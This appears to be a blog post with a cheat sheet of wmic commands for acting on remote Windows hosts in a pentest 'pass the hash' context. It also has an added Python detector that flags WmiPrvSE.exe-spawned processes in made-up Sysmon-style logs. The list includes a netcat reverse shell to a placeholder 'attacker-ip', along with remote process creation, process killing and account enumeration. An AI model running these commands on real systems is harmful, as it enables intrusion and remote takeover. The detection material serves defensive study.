In a previous article, we introduced the use of WMIC in a "pass the hash" shell.
Below is a list of useful wmic commands gathered from around the internet:
rem remember impersonate is ok but delegate is not
rem become familiar with the available aliases
wmic alias list brief
rem see the available methods for any class
wmic [class] call /?
rem file stuff
wmic /node:target DATAFILE where "drive='c:' AND path='\\windows\\'" GET Name,readable,size
wmic /node:target datafile "c:\\temp\\test.txt" call rename c:\temp\abc.txt
wmic /node:target datafile "c:\\temp\\test.txt" call copy c:\temp\abc.txt
rem process stuff
wmic /node:target process call create "nc attacker-ip 9000 -e cmd.exe"
wmic /node:target process call create "cmd.exe /c echo test > c:\temp\test.txt"
wmic /node:target process where name="explorer.exe" call terminate
wmic /node:target process where processid="1234" call terminate
wmic /node:target process get name, processid
rem users and groups stuff
WMIC /node:target USERACCOUNT LIST brief
wmic /node:target path Win32_GroupUser
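From the defender's side, the giveaway for the "process call create" commands above is that the new process on the target is a child of the WMI Provider Host (WmiPrvSE.exe). The following is an added example, not part of the original article: a small Python detector run over constructed, simplified Sysmon-style process-creation lines (the field layout, hostnames, users and paths are made up for illustration).

```python
import re

# Constructed sample events in a simplified "key: value | key: value" layout
# modelled on Sysmon Event ID 1 (process creation). Not real logs; the users,
# paths and command lines are invented, two of them echoing the wmic commands
# discussed above.
SAMPLE_EVENTS = [
    "Image: C:\\Windows\\System32\\cmd.exe | CommandLine: cmd.exe /c echo test > c:\\temp\\test.txt | "
    "ParentImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe | User: CORP\\svc-admin",
    "Image: C:\\Windows\\explorer.exe | CommandLine: explorer.exe | "
    "ParentImage: C:\\Windows\\System32\\userinit.exe | User: CORP\\alice",
    "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | "
    "CommandLine: powershell.exe enable-psremoting -force | "
    "ParentImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe | User: CORP\\svc-admin",
]

# One "Key: value" pair; the value runs until the next " | Key: " separator or end of line,
# so colons and backslashes inside a command line do not break the split.
FIELD_RE = re.compile(r"(\w+): (.*?)(?= \| \w+: |$)")

WMI_PROVIDER_HOST = "wmiprvse.exe"


def parse_event(line):
    """Turn one sample line into a dict of its fields."""
    return dict(FIELD_RE.findall(line))


def is_wmi_spawned(event):
    """True when the parent is WmiPrvSE.exe, i.e. the process was created through
    Win32_Process.Create, which is what 'wmic /node:... process call create' uses."""
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    return parent == WMI_PROVIDER_HOST


def find_wmi_spawned(lines):
    """Return (Image, CommandLine, User) for every WMI-spawned process in the input."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_wmi_spawned(ev):
            hits.append((ev["Image"], ev["CommandLine"], ev["User"]))
    return hits


if __name__ == "__main__":
    for image, cmdline, user in find_wmi_spawned(SAMPLE_EVENTS):
        print(f"WMI-spawned process: {image} as {user}: {cmdline}")
```

WmiPrvSE.exe also parents plenty of legitimate management activity, so in practice this match is a starting point to correlate with a preceding network logon from the calling host rather than an alert on its own.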
[…] psremoting on the remote target host (use wmic / see previous article): powershell.exe "enable-psremoting […]